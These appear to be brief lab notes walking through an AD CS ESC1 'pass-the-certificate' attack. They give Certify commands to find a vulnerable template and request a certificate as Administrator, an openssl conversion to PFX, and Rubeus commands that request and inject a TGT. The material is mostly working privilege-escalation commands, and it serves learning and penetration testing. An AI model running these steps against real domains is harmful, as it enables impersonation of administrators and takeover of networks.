List vulnerable certificate templates:

.\Certify.exe find /vulnerable /quiet

Request a new certificate

.\Certify.exe request /ca:WIN-8DRJKS8Q1T9.labad.fr\labad-CA /template:ESC1_TEST1 /altname:Administrator

A certificate is generated (PEM). It must then be converted to PFX with the openssl command, and enter a new password for the certificate

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Then use this pfx certificate with rubeus (a tool for raw Kerberos interaction) and request a TGT

This attack is named “pass-the-certificate”, see https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate

# usage
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
# example
.\Rubeus.exe asktgt /user:Administrator /certificate:<cert.pfx path> /password:<pfx password> /ptt

The TGT is automatically saved in your environment (thanks to /ptt in rubeus), then you can use a simple dir by specifying the target: for more, see Working-with-TGT